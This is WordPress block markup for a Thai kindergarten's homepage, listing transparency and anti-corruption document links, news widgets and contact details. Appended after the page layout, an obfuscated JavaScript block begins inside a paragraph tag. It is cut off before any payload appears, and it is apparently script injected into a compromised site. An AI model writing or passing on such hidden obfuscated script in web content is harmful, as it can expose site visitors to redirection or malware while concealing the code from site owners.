href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 